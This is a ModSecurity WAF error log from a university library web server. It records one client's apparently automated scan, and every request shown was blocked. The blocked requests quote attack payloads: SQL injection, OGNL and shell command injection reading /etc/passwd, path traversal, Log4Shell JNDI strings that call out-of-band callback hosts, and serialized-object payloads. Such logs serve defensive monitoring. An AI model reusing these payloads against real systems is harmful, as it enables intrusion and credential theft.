[Tue Aug 29 11:32:18.353348 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' union select 1,2,3,4,5,6,7,md5(999999999),9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAQnF98AAAAF"]
[Tue Aug 29 11:32:18.357384 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xef\\xbf\\xbd'  found within ARGS:x: 11\\xef\\xbf\\xbd' union select 1,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9 from qs_admin"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/plus/ajax_street.php"] [unique_id "ZO100sCo-f0AAAP5mRIAAAAM"]
[Tue Aug 29 11:32:21.308333 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: []{\\x22 found within ARGS:name: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\\x22cat\\x22, \\x22/etc/passwd\\x22})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\\x22com.opensymphony.xwork2.dispatcher.HttpServletResponse\\x22),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/user.action"] [unique_id "ZO101cCo-f0AAAQV4WMAAAA3"]
[Tue Aug 29 11:32:21.419908 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/logupload"] [unique_id "ZO101cCo-f0AAAQV4WcAAAA3"]
[Tue Aug 29 11:32:22.525970 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:shattr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );-- -\\x22} found within ARGS:shattr: {\\x22id\\x22:\\x221 AND (SELECT 1 FROM(SELECT SLEEP(4))aaaa);-- -\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO101sCo-f0AAAQOv88AAAAw"]
[Tue Aug 29 11:32:23.312812 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )))# found within ARGS:username: dd' or extractvalue(0x0a,concat(0x0a,md5(999999999)))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1018Co-f0AAAQUIEMAAAA2"]
[Tue Aug 29 11:32:23.354918 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:device. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:device: aaaaa:a'\\x22;user|s.\\x221337\\x22;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/esp/cms_changeDeviceContext.esp"] [unique_id "ZO1018Co-f0AAAQOv9MAAAAw"]
[Tue Aug 29 11:32:25.335194 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:c. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:c: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/plus/flink.php"] [unique_id "ZO102cCo-f0AAARA7ZUAAAAA"]
[Tue Aug 29 11:32:25.344905 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO102cCo-f0AAAQOv9kAAAAw"]
[Tue Aug 29 11:32:27.588431 2023] [:error] [pid 1094] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO1028Co-f0AAARGwcgAAAAL"]
[Tue Aug 29 11:32:28.379747 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/imc/javax.faces.resource/dynamiccontent.properties.xhtml"] [unique_id "ZO103MCo-f0AAANWgbQAAAAG"]
[Tue Aug 29 11:32:30.302711 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:parent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:parent: \\x22 UNION SELECT NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL-- aa"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php"] [unique_id "ZO103sCo-f0AAANWgbsAAAAG"]
[Tue Aug 29 11:32:31.308703 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:SPOOLDIR. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:SPOOLDIR: test\\x22.system(id).\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1038Co-f0AAAQnGA8AAAAF"]
[Tue Aug 29 11:32:32.375755 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:field: field:exec:head -1/etc/passwd:null:null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO104MCo-f0AAAPDoHIAAAAP"]
[Tue Aug 29 11:32:32.392936 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\xe2\\x80\\x94\\r\\n [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARIwI0AAAAO"]
[Tue Aug 29 11:32:32.392989 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid boundary: ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\\x5cxe2\\x5cx80\\x5cx94\\x5cr\\x5cn"] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO104MCo-f0AAARIwI0AAAAO"]
[Tue Aug 29 11:32:35.357346 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlggp4oadsxnti46.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within REQUEST_COOKIES:${jndi:ldap://127.0.0.1#.${hostName}.cookiename.cjmn8l5jmimk2adbbnlggp4oadsxnti46.oast.site}: ${jndi:ldap://${hostName}.cookievalue.cjmn8l5jmimk2adbbnlg8mu81j54nuwbf.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO1048Co-f0AAARA7Z4AAAAA"]
[Tue Aug 29 11:32:36.357546 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARA7aAAAAAA"]
[Tue Aug 29 11:32:37.431251 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAAPDoHgAAAAP"]
[Tue Aug 29 11:32:38.387110 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARMMc0AAAAR"]
[Tue Aug 29 11:32:38.425040 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARA7agAAAAA"]
[Tue Aug 29 11:32:40.405428 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg8g8u4cdy58bft.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARA7bIAAAAA"]
[Tue Aug 29 11:32:42.509262 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAAQOv-YAAAAw"]
[Tue Aug 29 11:32:46.404321 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARR22sAAAAF"]
[Tue Aug 29 11:32:47.539739 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAAPDoIsAAAAP"]
[Tue Aug 29 11:32:47.596090 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAAQOv-sAAAAw"]
[Tue Aug 29 11:32:49.428961 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAARH7KkAAAAM"]
[Tue Aug 29 11:32:49.459665 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAAQKOf4AAAAs"]
[Tue Aug 29 11:32:51.465136 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARD1REAAAAH"]
[Tue Aug 29 11:32:59.300626 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARYxBoAAAAJ"]
[Tue Aug 29 11:32:59.340471 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARR24YAAAAF"]
